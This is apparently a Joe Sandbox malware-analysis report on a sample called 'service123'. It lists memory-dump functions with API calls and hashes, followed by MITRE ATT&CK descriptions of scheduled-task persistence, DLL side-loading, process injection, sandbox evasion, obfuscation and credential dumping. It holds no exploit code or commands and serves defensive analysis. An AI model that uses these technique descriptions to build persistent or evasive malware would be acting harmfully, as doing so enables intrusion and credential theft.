Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 623ae069ef8f146d1beb39a0dc78d5b9bc85d7f9cc233637ab5786bb069e9413
Instruction ID: 1712ca03b3a36e8989ed6972f9da0575ebef167bb22f0f8ea810d714ab19979a
Opcode Fuzzy Hash: 623ae069ef8f146d1beb39a0dc78d5b9bc85d7f9cc233637ab5786bb069e9413
Instruction Fuzzy Hash: 10F15EB4A016068FC700DFADC1849AEF7F0FF44314B158A59E895CBB55E731E98ACB81

Function 007929B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00792A31

Strings

NaN, xrefs: 007929B1

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction ID: 3c11ad9ba04e770a8b26df3d34b5c83f3a9325743ce05b9b7bbbef56fe2e832b
Opcode Fuzzy Hash: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction Fuzzy Hash: A4410772A05215DBDB24EF18D4C4756B7E1EF89710B29C299DD889F24BD33AEC438B90

Function 6C9E3080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C9E3101

Strings

NaN, xrefs: 6C9E3081

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction ID: f883dfa6bcf929a99837d7b92006900a97de8247c4a3fbaa11762153aadf290a
Opcode Fuzzy Hash: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction Fuzzy Hash: 244117B1A05615CBCB11CF29C480796B7E5BF99708B29C29DDC488F76AD332DD468B90

Function 6CA64DD0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA64E0A
strlen.MSVCRT ref: 6CA64E8D
strlen.MSVCRT ref: 6CA64F10
strlen.MSVCRT ref: 6CA64F93

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1e21c3b3ca9f632c8d13140c10002c10e3216c65a9d6fee3b9482e506bba17c6
Instruction ID: eafae1f33321c3469f1ca95e0b5a6d2e6f7c28490d15d72a27836703be0781a6
Opcode Fuzzy Hash: 1e21c3b3ca9f632c8d13140c10002c10e3216c65a9d6fee3b9482e506bba17c6
Instruction Fuzzy Hash: A9E17870A057058FCB00DFADC5C09AEBBF1BF45314B158669E8A5CBB55E730E98ACB81

Function 6CA645D0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA6460A
strlen.MSVCRT ref: 6CA6468D
strlen.MSVCRT ref: 6CA64710
strlen.MSVCRT ref: 6CA64793

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: f15faf15598a29b1254ca4d9a863659f3cb141302f27f28cba6765e64a6e5ea0
Instruction ID: 560ce4a3289b16b5c3f0a38dd7763ff36577db6514153fddab665ed503bd2d2c
Opcode Fuzzy Hash: f15faf15598a29b1254ca4d9a863659f3cb141302f27f28cba6765e64a6e5ea0
Instruction Fuzzy Hash: 42E17874A056058FC700DFADC1949AEFBF1BF45314B148A69E8A5CBB54E730E88ACF81

Function 6C9EE1F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 6C9EE1FE
strlen.MSVCRT ref: 6C9EE211

Strings

basic_string: construction from null is not valid, xrefs: 6C9EE233

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: 21b99ee30a8ce1ec876b100a3651f2edf0ee6bebf0c723fe5a2ec4ee5937176a
Instruction ID: e3aa9aa49f9884f4746ff10d2384747f30d67e851ed4673e39842ecf8b74b279
Opcode Fuzzy Hash: 21b99ee30a8ce1ec876b100a3651f2edf0ee6bebf0c723fe5a2ec4ee5937176a
Instruction Fuzzy Hash: 34118472A046009F8705FF7DC94145A77F5AFA9220F45CA69D854C7704E634D8098FE3

Function 00792F46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00792E97
fputc.MSVCRT ref: 00792F07
memset.MSVCRT ref: 00792FC2

Strings

o, xrefs: 00792F5E

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction ID: 79fb894126cf060cf1adffdf530d761e18bd49cee697e3288b9e6b4b65dff7dc
Opcode Fuzzy Hash: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction Fuzzy Hash: A0316C72A04205DFCF10DF68D188799BBF1BF48340F158619D9899B702E738ED41CB80

Function 6C9E3616 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C9E3567
fputc.MSVCRT ref: 6C9E35D7
memset.MSVCRT ref: 6C9E3692

Strings

o, xrefs: 6C9E362E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction ID: 21717167d49f488d56b76e7f3fbafec6a98b8f712fb82769ea3e3e5c64a7b640
Opcode Fuzzy Hash: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction Fuzzy Hash: D4313871908605CFCB02CF79C1807A9BBF5BF6C354F168659D989ABB21EB34E901CB40

Function 00793424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 0079338F
fputc.MSVCRT ref: 007933F1

Strings

@, xrefs: 0079342A

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction ID: 771d410d950d1409aac4d4a3f3a3bfe3b555a16bd544484afc394cdc528655ad
Opcode Fuzzy Hash: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction Fuzzy Hash: 3E113AB1A446008BDF14CF28D1847697BF1BF45304F258659DD999F24ADB38ED00CB44

Function 6C9E3AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C9E3A5F
fputc.MSVCRT ref: 6C9E3AC1

Strings

@, xrefs: 6C9E3AFA

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction ID: 011faaa1f4e8355beb755525a2d9de4f8b3df1aca92d249d3e6c07c80a461b1f
Opcode Fuzzy Hash: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction Fuzzy Hash: 30111FB1A052209BCB02CF38C1847997BF5BF6D304F658699DD995FB6AD334E881CB44

Function 007918B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 0079191E

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 007918FF
Unknown error, xrefs: 007918B2

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 1a2da415212dcbdad46167d9b3a4ebbf7d209f9fb92e4e289da4356f6656be36
Instruction ID: 57ddcb183ade501ceda16afd7fe319544cd76ef43d97b9deb55c1881693f2268
Opcode Fuzzy Hash: 1a2da415212dcbdad46167d9b3a4ebbf7d209f9fb92e4e289da4356f6656be36
Instruction Fuzzy Hash: 7001D270408B45DBDB00AF15E48841ABFF1FF8A350F868C9CE5C846269DB36D8A8C787

Function 6C9F77B1 Relevance: 5.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9F77D3

Part of subcall function 6CA44050: memcpy.MSVCRT(?,?,?,?,-00000001,?,?,6C9F77E6), ref: 6CA440B3

strlen.MSVCRT ref: 6C9F7844
strlen.MSVCRT ref: 6C9F78B2
strlen.MSVCRT ref: 6C9F7926

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 60bc1c0daf12ad257037ef0412e6565e4498a1fc77bfc0b051e9e2ae4d013332
Instruction ID: 15748d1c92db9019cdf13af069f0ca9915d49ea0c734554d2a8c96211ff76d4d
Opcode Fuzzy Hash: 60bc1c0daf12ad257037ef0412e6565e4498a1fc77bfc0b051e9e2ae4d013332
Instruction Fuzzy Hash: 8E5137B0A05A118FCB00EF28C19865DFBF6BF99304F0185ADD8915F720CB35E84ACB82

Function 00796B60 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,00796C81,?,?,?,?,?,?,00000000,00794F24), ref: 00796B87
InitializeCriticalSection.KERNEL32(?,?,?,?,00796C81,?,?,?,?,?,?,00000000,00794F24), ref: 00796BC4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,00796C81,?,?,?,?,?,?,00000000,00794F24), ref: 00796BD0
EnterCriticalSection.KERNEL32(?,?,?,?,00796C81,?,?,?,?,?,?,00000000,00794F24), ref: 00796BF8

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 7f34b62b2100d274ad0fbb5753a176f7b0f9234e560d7c11817486e451eabcd5
Instruction ID: 33553d67e9c01a56526be7f81ae560afb9a19ff405d34879fbf33923f7990440
Opcode Fuzzy Hash: 7f34b62b2100d274ad0fbb5753a176f7b0f9234e560d7c11817486e451eabcd5
Instruction Fuzzy Hash: 08115BF15091048ADF21BB3CF9C916A77E0EB01354F658A2AD482C3210F63DECA5C79A

Function 6C9E8080 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,00000002,?,6C9E81A1), ref: 6C9E80A7
InitializeCriticalSection.KERNEL32(?,?,00000002,?,6C9E81A1), ref: 6C9E80E4
InitializeCriticalSection.KERNEL32(?,?,?,00000002,?,6C9E81A1), ref: 6C9E80F0
EnterCriticalSection.KERNEL32(?,?,00000002,?,6C9E81A1), ref: 6C9E8118

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: f28908c5e4b90630acb576f627cc2f8cc723e173b74d44be48143020eca2a6f8
Instruction ID: 7c962a87fc49ecd54dbd9f0181bdc49964ed7e9eb986fd673734146dae5a14d4
Opcode Fuzzy Hash: f28908c5e4b90630acb576f627cc2f8cc723e173b74d44be48143020eca2a6f8
Instruction Fuzzy Hash: A811A5B1505201CBDF0AAFBCA9C625977B8EF1B314F514926C462C3600D631D995C797

Function 00792000 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,007921D3,?,?,?,?,?,007917E8), ref: 0079200E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,007921D3,?,?,?,?,?,007917E8), ref: 00792035
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,007921D3,?,?,?,?,?,007917E8), ref: 0079203C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,007921D3,?,?,?,?,?,007917E8), ref: 0079205C

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: a58ebf1b3bad731d127f4ab326a849b2195d42275d7ffb879cbbd90730a8274f
Instruction ID: d7856ed7ce48d652451d8cc9b9bbdbe4e41d4fa57b619c2a13095039a87fcc51
Opcode Fuzzy Hash: a58ebf1b3bad731d127f4ab326a849b2195d42275d7ffb879cbbd90730a8274f
Instruction Fuzzy Hash: 3AF0A4755003049FDF20BF7CF88451A7BA4EA04740F054439DD4847215E739EC07CBA6

Function 6C9DAB50 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C9DAB5E
TlsGetValue.KERNEL32 ref: 6C9DAB85
GetLastError.KERNEL32 ref: 6C9DAB8C
LeaveCriticalSection.KERNEL32 ref: 6C9DABAC

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: afcc87706661a544dc8a8358e84acc39e93fbb46f6c8f305f408d86cf55a2b36
Instruction ID: 2c5fdc9f6b3a253cab10366d96e0ffc6bf8b12683f9e94ed98da28f2c561ae4d
Opcode Fuzzy Hash: afcc87706661a544dc8a8358e84acc39e93fbb46f6c8f305f408d86cf55a2b36
Instruction Fuzzy Hash: 42F081B2A007028FDB04BF79A98591A7B78EE45264F068178DD6497214EA30E55A8BA2

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
